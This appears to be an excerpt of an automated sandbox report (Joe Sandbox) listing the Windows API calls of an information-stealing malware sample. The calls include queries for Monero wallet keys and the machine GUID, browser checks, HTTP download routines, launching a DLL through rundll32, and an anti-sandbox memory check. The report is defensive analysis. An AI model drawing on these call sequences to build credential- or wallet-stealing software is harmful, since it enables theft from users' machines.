                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                        • String ID: - $%s\%s$?
                                                                                                        • API String ID: 1736561257-3278919252
                                                                                                        • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                        • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                        • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                        • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                        • String ID: <+A
                                                                                                        • API String ID: 2507841554-2778417545
                                                                                                        • Opcode ID: 5e4e021ec0192b1193050b53ddbdf8b404a91beb29f97cbda7458c2ceee8302e
                                                                                                        • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                        • Opcode Fuzzy Hash: 5e4e021ec0192b1193050b53ddbdf8b404a91beb29f97cbda7458c2ceee8302e
                                                                                                        • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                        Similarity
                                                                                                        • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                        • API String ID: 4174444224-1526165396
                                                                                                        • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                        • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                        • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                        • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                        APIs
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                        • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy
                                                                                                        • String ID: Stable\$ Stable\$firefox
                                                                                                        • API String ID: 3722407311-2697854757
                                                                                                        • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                        • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                        • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                        • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                        APIs
                                                                                                        • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                          • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                          • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                        • String ID: LzA
                                                                                                        • API String ID: 1968765330-1388989900
                                                                                                        • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                        • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                        • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                        • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                        APIs
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                        • _memset.LIBCMT ref: 0040FBC1
                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                          • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: OpenProcess_memmove_memset
                                                                                                        • String ID: N0ZWFt
                                                                                                        • API String ID: 2647191932-431618156
                                                                                                        • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                        • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                        • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                        • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                        • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                        • String ID: V@
                                                                                                        • API String ID: 2311089104-383300688
                                                                                                        • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                        • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                        • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                        • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00401ADC
                                                                                                          • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                          • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                          • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                          • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                        • String ID: .keys$\Monero\wallet.keys
                                                                                                        • API String ID: 3529164666-3586502688
                                                                                                        • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                        • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                        • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                        • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00411607
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                        • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CharOpenQueryValue_memset
                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                        • API String ID: 2355623204-1211650757
                                                                                                        • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                        • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                        • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                        • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                        • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                        Strings
                                                                                                        • wallet_path, xrefs: 00401A9C
                                                                                                        • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                        • API String ID: 3676486918-4244082812
                                                                                                        • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                        • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                        • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                        • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                        • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                        • _wtoi64.MSVCRT ref: 004117C1
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                        • String ID:
                                                                                                        • API String ID: 181426013-0
                                                                                                        • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                        • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                        • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                        • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                        • _memset.LIBCMT ref: 004010D0
                                                                                                        • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                        • ExitProcess.KERNEL32 ref: 00401112
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1859398019-0
                                                                                                        • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                        • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                        • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                        • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                        • API String ID: 2215929589-2108736111
                                                                                                        • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                        • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                        • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                        • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004116CE
                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                        • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                        • String ID: Unknown
                                                                                                        • API String ID: 2781187439-1654365787
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411138
